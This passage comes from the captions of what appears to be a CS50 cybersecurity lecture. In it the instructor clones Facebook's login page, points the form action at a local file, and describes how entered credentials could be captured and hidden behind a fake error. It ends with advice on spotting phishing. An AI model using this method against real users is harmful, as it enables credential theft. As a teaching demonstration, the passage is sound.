big site-- 1608 01:26:20,480 --> 01:26:27,080 and then I can just control A, copy, select all, copy all of the content, 1609 01:26:27,080 --> 01:26:33,500 and paste this in to my index.html, and we will save. 1610 01:26:33,500 --> 01:26:36,140 1611 01:26:36,140 --> 01:26:40,970 And then we'll head back into our terminal here, 1612 01:26:40,970 --> 01:26:45,170 and I will start Chrome on the file index.html, which 1613 01:26:45,170 --> 01:26:49,400 is the file that I literally just saved my Facebook information in. 1614 01:26:49,400 --> 01:26:51,040 So start Chrome index.html. 1615 01:26:51,040 --> 01:26:53,360 You'll notice that it brings me to this URL 1616 01:26:53,360 --> 01:26:56,670 here, which is the file for where I currently live, 1617 01:26:56,670 --> 01:26:58,310 or where this file currently lives. 1618 01:26:58,310 --> 01:27:00,920 And this page looks like Facebook, except for the fact that, 1619 01:27:00,920 --> 01:27:04,220 when I log in, I then get redirected back 1620 01:27:04,220 --> 01:27:07,370 to something that actually is Facebook and is not something that I control. 1621 01:27:07,370 --> 01:27:10,820 But at the outset, my page here at the very beginning 1622 01:27:10,820 --> 01:27:14,810 looks identical to Facebook. 1623 01:27:14,810 --> 01:27:16,790 Now, the trick here would be to do something 1624 01:27:16,790 --> 01:27:20,780 so that the user would provide information here in the email box 1625 01:27:20,780 --> 01:27:24,397 and then here in the password field such that when they click Login, 1626 01:27:24,397 --> 01:27:26,480 I might be able to get that information from them. 1627 01:27:26,480 --> 01:27:30,500 Maybe I just am waiting to capture their information. 1628 01:27:30,500 --> 01:27:35,450 So the next step for me might be to go back into my random set of stuff here. 1629 01:27:35,450 --> 01:27:38,570 There's a lot of random code that we don't really care about. 1630 01:27:38,570 --> 01:27:41,030 But the one thing I do care about is what happens when 1631 01:27:41,030 --> 01:27:43,790 somebody clicks on this Login button. 1632 01:27:43,790 --> 01:27:45,590 That is interesting to me. 1633 01:27:45,590 --> 01:27:48,230 So I'm going to go through this and just do control F, 1634 01:27:48,230 --> 01:27:51,968 control F just being find, the string login. 1635 01:27:51,968 --> 01:27:54,260 That's the text that's literally written on the button, 1636 01:27:54,260 --> 01:27:55,843 so hopefully I'll find that somewhere. 1637 01:27:55,843 --> 01:27:58,160 I'm told I have eight results. 1638 01:27:58,160 --> 01:27:59,990 So this is, if I just kind of look around 1639 01:27:59,990 --> 01:28:01,698 for context to try and figure out where I 1640 01:28:01,698 --> 01:28:05,660 am in the code, the title of something, so that's probably not it. 1641 01:28:05,660 --> 01:28:07,180 So I don't want to go there. 1642 01:28:07,180 --> 01:28:10,640 Create an account or login, not quite what I'm looking for. 1643 01:28:10,640 --> 01:28:12,620 So go the next one. 1644 01:28:12,620 --> 01:28:15,890 OK, here we go, input value equals login. 1645 01:28:15,890 --> 01:28:18,680 So now I found an input that is called login. 1646 01:28:18,680 --> 01:28:22,110 So this is presumably a button that's presumably part of some form. 1647 01:28:22,110 --> 01:28:25,820 So if I scroll up a little bit higher, hopefully I 1648 01:28:25,820 --> 01:28:29,570 will find a form, which I do, form ID. 1649 01:28:29,570 --> 01:28:30,920 And it has an action. 1650 01:28:30,920 --> 01:28:34,040 The action is to go to this particular page, 1651 01:28:34,040 --> 01:28:37,310 facebook.com/login/ and so on and so on. 1652 01:28:37,310 --> 01:28:39,820 But maybe I want to send it somewhere else. 1653 01:28:39,820 --> 01:28:44,000 So if I replace this entire URL with where I actually want to send the user, 1654 01:28:44,000 --> 01:28:46,160 where maybe I'm going to capture their information, 1655 01:28:46,160 --> 01:28:49,220 maybe I'll store this in login.html. 1656 01:28:49,220 --> 01:28:51,140 And so that's what's going to come in here. 1657 01:28:51,140 --> 01:28:56,210 And then we'll save the file such that our changes have been captured. 1658 01:28:56,210 --> 01:28:58,370 So presumably what should happen is now, when 1659 01:28:58,370 --> 01:29:02,420 you click on the Login button in my fake Facebook, 1660 01:29:02,420 --> 01:29:08,000 you instead get redirected to login.html rather than the Facebook actual login 1661 01:29:08,000 --> 01:29:10,458 as we saw just a moment ago. 1662 01:29:10,458 --> 01:29:11,250 So let's try again. 1663 01:29:11,250 --> 01:29:14,870 We'll go back here to our fake Facebook page. 1664 01:29:14,870 --> 01:29:18,880 We will refresh so that we get our new content. 1665 01:29:18,880 --> 01:29:20,860 Remember, we just changed the HTML content, 1666 01:29:20,860 --> 01:29:23,900 so we actually need to reload it so that our browser has it. 1667 01:29:23,900 --> 01:29:31,250 And we'll type in abc@cs50.net and then some password here and click Login, 1668 01:29:31,250 --> 01:29:32,990 and we get redirected here. 1669 01:29:32,990 --> 01:29:35,630 Sorry, we are unable to log you in at this time. 1670 01:29:35,630 --> 01:29:38,270 But notice we're still in a file that I created. 1671 01:29:38,270 --> 01:29:41,973 I didn't show you login.html, but that's exactly what I put there. 1672 01:29:41,973 --> 01:29:44,390 Now, I'm not actually going to phish for information here. 1673 01:29:44,390 --> 01:29:46,370 And I'm going to do something that would arguably vio-- 1674 01:29:46,370 --> 01:29:48,100 even though I'm using fake data here, I'm 1675 01:29:48,100 --> 01:29:50,808 not going to do something that would violate the terms of service 1676 01:29:50,808 --> 01:29:54,500 or get myself in trouble by actually attempting to do some phishing here. 1677 01:29:54,500 --> 01:29:58,070 But imagine instead of some HTML I had some Python code that was 1678 01:29:58,070 --> 01:30:00,740 able to read the data from that field. 1679 01:30:00,740 --> 01:30:02,840 We saw that a moment ago with passwords, right? 1680 01:30:02,840 --> 01:30:06,860 We know that the possibility exists that if the user types something 1681 01:30:06,860 --> 01:30:10,850 into a field, we have the ability to extract it. 1682 01:30:10,850 --> 01:30:13,340 What I could do here is very simple. 1683 01:30:13,340 --> 01:30:18,200 I could just read those two fields where they typed a username and a password 1684 01:30:18,200 --> 01:30:20,032 but then display this content. 1685 01:30:20,032 --> 01:30:22,490 Perhaps it's been the case that you've gone to some website 1686 01:30:22,490 --> 01:30:26,300 and seen, oh, yeah, sorry, the server can't handle this request right now, 1687 01:30:26,300 --> 01:30:28,820 or something along those lines. 1688 01:30:28,820 --> 01:30:30,650 And you maybe think nothing of it. 1689 01:30:30,650 --> 01:30:33,530 Or maybe I even would then have a link here that says, try again. 1690 01:30:33,530 --> 01:30:35,870 And if you click Try Again, it would bring you back 1691 01:30:35,870 --> 01:30:39,860 to Facebook's actual login where you would then enter your credentials 1692 01:30:39,860 --> 01:30:42,560 and try again and perhaps think everything was fine. 1693 01:30:42,560 --> 01:30:46,520 But if on this login page I had extracted your username and password 1694 01:30:46,520 --> 01:30:49,120 by tricking you into thinking you were logging into Facebook, 1695 01:30:49,120 --> 01:30:51,203 and then maybe I save those in some file somewhere 1696 01:30:51,203 --> 01:30:54,882 and then just display this to you, you think, ah, they just had an error. 1697 01:30:54,882 --> 01:30:56,090 Things are a little bit busy. 1698 01:30:56,090 --> 01:30:57,050 I'll try again. 1699 01:30:57,050 --> 01:30:58,910 And when you try again, it works. 1700 01:30:58,910 --> 01:31:00,770 It's really that easy. 1701 01:31:00,770 --> 01:31:05,600 And the way to avoid phishing expeditions, so to speak, 1702 01:31:05,600 --> 01:31:07,530 are just to be mindful of what you're doing. 1703 01:31:07,530 --> 01:31:11,000 Take a look at the URL bar to make sure that you're on the page 1704 01:31:11,000 --> 01:31:12,983 that you think you're on. 1705 01:31:12,983 --> 01:31:14,900 Hopefully you've come away now with a bit more 1706 01:31:14,900 --> 01:31:16,775 of an understanding of cybersecurity and some 1707 01:31:16,775 --> 01:31:19,700 of the best practices that are put in place to deal 1708 01:31:19,700 --> 01:31:21,740 with potential cybersecurity threats. 1709 01:31:21,740 --> 01:31:24,320 Now it's incumbent upon us to use the technology 1710 01:31:24,320 --> 01:31:28,130 that we have available to help us protect ourselves from ourselves, 1711 01:31:28,130 --> 01:31:33,020 but not only ourselves and our own data, but also working to protect our clients 1712 01:31:33,020 --> 01:31:35,200 and their data as well. 1713 01:31:35,200 --> 01:31:36,533